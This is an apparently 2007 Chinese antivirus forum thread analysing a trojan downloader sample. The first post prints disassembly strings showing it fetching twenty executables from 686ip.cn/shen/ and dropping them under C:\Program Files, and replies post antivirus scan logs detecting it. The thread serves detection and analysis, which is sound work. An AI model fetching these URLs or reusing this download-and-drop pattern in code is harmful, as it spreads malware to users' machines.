下载者一只[D6CC2C]

promised

1. 00403506 PUSH ma_unpac.004037BC ASCII "C:\Program Files\1.exe"
   
2. 0040350B PUSH ma_unpac.004037D4 ASCII "http://www.686ip.cn/shen/1.exe"
   
3. 0040351B PUSH ma_unpac.004037F4 ASCII "C:\Program Files\2.exe"
   
4. 00403520 PUSH ma_unpac.0040380C ASCII "http://www.686ip.cn/shen/2.exe"
   
5. 00403525 PUSH 0 (初始 CPU 选择)
   
6. 00403530 PUSH ma_unpac.0040382C ASCII "C:\Program Files\3.exe"
   
7. 00403535 PUSH ma_unpac.00403844 ASCII "http://www.686ip.cn/shen/3.exe"
   
8. 00403545 PUSH ma_unpac.00403864 ASCII "C:\Program Files\4.exe"
   
9. 0040354A PUSH ma_unpac.0040387C ASCII "http://www.686ip.cn/shen/4.exe"
   
10. 0040355A PUSH ma_unpac.0040389C ASCII "C:\Program Files\5.exe"
    
11. 0040355F PUSH ma_unpac.004038B4 ASCII "http://www.686ip.cn/shen/5.exe"
    
12. 0040356F PUSH ma_unpac.004038D4 ASCII "C:\Program Files\6.exe"
    
13. 00403574 PUSH ma_unpac.004038EC ASCII "http://www.686ip.cn/shen/6.exe"
    
14. 00403584 PUSH ma_unpac.0040390C ASCII "C:\Program Files\7.exe"
    
15. 00403589 PUSH ma_unpac.00403924 ASCII "http://www.686ip.cn/shen/7.exe"
    
16. 00403599 PUSH ma_unpac.00403944 ASCII "C:\Program Files\8.exe"
    
17. 0040359E PUSH ma_unpac.0040395C ASCII "http://www.686ip.cn/shen/8.exe"
    
18. 004035AE PUSH ma_unpac.0040397C ASCII "C:\Program Files\9.exe"
    
19. 004035B3 PUSH ma_unpac.00403994 ASCII "http://www.686ip.cn/shen/9.exe"
    
20. 004035C3 PUSH ma_unpac.004039B4 ASCII "C:\Program Files\10.exe"
    
21. 004035C8 PUSH ma_unpac.004039CC ASCII "http://www.686ip.cn/shen/10.exe"
    
22. 004035D8 PUSH ma_unpac.004039EC ASCII "C:\Program Files\11.exe"
    
23. 004035DD PUSH ma_unpac.00403A04 ASCII "http://www.686ip.cn/shen/11.exe"
    
24. 004035ED PUSH ma_unpac.00403A24 ASCII "C:\Program Files\12.exe"
    
25. 004035F2 PUSH ma_unpac.00403A3C ASCII "http://www.686ip.cn/shen/12.exe"
    
26. 00403602 PUSH ma_unpac.00403A5C ASCII "C:\Program Files\13.exe"
    
27. 00403607 PUSH ma_unpac.00403A74 ASCII "http://www.686ip.cn/shen/13.exe"
    
28. 00403617 PUSH ma_unpac.00403A94 ASCII "C:\Program Files\14.exe"
    
29. 0040361C PUSH ma_unpac.00403AAC ASCII "http://www.686ip.cn/shen/14.exe"
    
30. 0040362C PUSH ma_unpac.00403ACC ASCII "C:\Program Files\15.exe"
    
31. 00403631 PUSH ma_unpac.00403AE4 ASCII "http://www.686ip.cn/shen/15.exe"
    
32. 00403641 PUSH ma_unpac.00403B04 ASCII "C:\Program Files\16.exe"
    
33. 00403646 PUSH ma_unpac.00403B1C ASCII "http://www.686ip.cn/shen/16.exe"
    
34. 00403656 PUSH ma_unpac.00403B3C ASCII "C:\Program Files\17.exe"
    
35. 0040365B PUSH ma_unpac.00403B54 ASCII "http://www.686ip.cn/shen/17.exe"
    
36. 0040366B PUSH ma_unpac.00403B74 ASCII "C:\Program Files\18.exe"
    
37. 00403670 PUSH ma_unpac.00403B8C ASCII "http://www.686ip.cn/shen/18.exe"
    
38. 00403680 PUSH ma_unpac.00403BAC ASCII "C:\Program Files\19.exe"
    
39. 00403685 PUSH ma_unpac.00403BC4 ASCII "http://www.686ip.cn/shen/19.exe"
    
40. 00403695 PUSH ma_unpac.00403BE4 ASCII "C:\Program Files\20.exe"
    
41. 0040369A PUSH ma_unpac.00403BFC ASCII "http://www.686ip.cn/shen/20.exe"

复制代码

产物：http://bbs.kafan.cn/viewthread.php?tid=138642&extra=page%3D1

[ 本帖最后由 promised 于 2007-10-3 12:28 编辑 ]

FBAV

MicroVita AntiSpyware  
_____________________________________________
                                          
             风暴微塔反间谍
[强力查杀各种Win32位的病毒,木马,蠕虫,恶意软件]                  
                   http://221.10.254.214/
----------------------------------------------
开始扫描……

正在检查启动……
[C:\Documents and Settings\Administrator\桌面\Virus\ma\ma.exe]
                    …………发现Spy！报告:[2]
文件信息:  大小:9216  MD5:d6cc2c2611dc7a947d8020bb0ac8103c

文件数:1   病毒数:1  比重:1
OK  扫描完毕！
  ***日志解释
[4] 集中有害分析引擎
[3] 全局系统判断引擎   
[2] 文件特征码引擎
[1] 文件启发式引擎

[ 本帖最后由 FBAV 于 2007-10-3 12:27 编辑 ]

红心王子

2007-10-3        12:26:34        1191385594        Administrator        3220        Sign of "Win32:Downloader-LL [Trj]" has been found in "C:\Documents and Settings\Administrator\桌面\ma.rar\ma.exe" file.

moonsilver

瑞星病毒查杀结果报告

清除病毒种类列表：
病毒： Trojan.DL.Win32.Agent.zcy

2788298

dr.web就是报了一个downloader

mofunzone

Starting the file scan:

Begin scan in 'C:\Users\morgan\Documents\ma.rar'
C:\Users\morgan\Documents\
  ma.rar
    [0] Archive type: RAR
    --> ma.exe
        [DETECTION] Is the Trojan horse TR/Dldr.Soael
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!

The EQs

Scan performed at: 2007-10-3 12:47:11
Scanning Log
NOD32 version 2567 (20071002) NT
Command line: C:\Documents and Settings\Don johnson\桌面\ma.rar
Operating memory - is OK

Date: 3.10.2007  Time: 12:47:14
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\Don johnson\桌面\ma.rar
C:\Documents and Settings\Don johnson\桌面\ma.rar ?RAR ?ma.exe - probably unknown NewHeur_PE virus [7]
Number of scanned files: 2
Number of threats found: 1
Number of files cleaned: 1
Time of completion: 12:47:14 Total scanning time: 0 sec (00:00:00)

Notes:
[7] File is probably infected with an unknown virus.

Nerazzurri

IllusionWing

UGuard Log (Digital Fox - gankeyu@126.com)
UGuarduu.exe = 4.1.1
HC0.rlb = 2.8.9
HC2.rlb = 2.4.0
FN0.rlb = 2.3.1
扫描选项：扫描档案, 扩展, 忽略非活动, 忽略大文件, nFile, BAT模拟, 捆绑检测, 变形壳, 启发,
[扫描] [Level 2] 在 E:\Documents and Settings\Administrator\桌面\Vir\ma.rar>>ma.exe//UPX 检测到 Downloader.1327
任务 扫描 完成。共耗费的时间：0-00-00 00:00:00:0172，共扫描的文件数量：3，共扫描到的威胁数量：1，威胁率：0.33333333

hsjj2005

KAV7.0报